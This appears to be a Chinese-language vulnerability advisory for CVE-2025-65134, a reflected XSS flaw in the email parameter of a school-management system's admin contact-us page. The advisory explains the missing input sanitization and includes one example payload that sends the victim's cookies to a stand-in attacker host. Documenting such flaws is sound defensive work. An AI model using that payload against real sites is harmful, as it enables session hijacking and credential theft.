CVE-2025-65134manikandan580 School-management-system 1.0 版本中存在反射型跨站脚本(XSS)漏洞。该漏洞位于 /studentms/admin/contact-us.php 接口,由于未对 email POST 参数进行有效过滤,攻击者可诱导用户触发恶意脚本,从而窃取用户凭证或执行未授权操作。
该漏洞的根本原因在于服务器端未能对用户提交的 email POST 参数进行适当的输入净化和输出编码。在 /studentms/admin/contact-us.php 处理逻辑中,应用程序直接将用户输入的数据回显在 HTTP 响应页面中,未经过 HTML 转义。攻击者可以利用这一缺陷,精心构造包含恶意 JavaScript 代码的 Payload(例如:`<script>document.location='http://evil.com/?c='+document.cookie</script>`)。由于攻击无需认证(PR:N)且利用难度低(AC:L),攻击者只需诱导受害者访问带有恶意参数的 URL 或提交特定表单,即可在受害者的浏览器上下文中执行任意代码。这可能导致会话劫持、敏感信息窃取或进一步的重定向攻击,对系统的机密性和完整性构成威胁。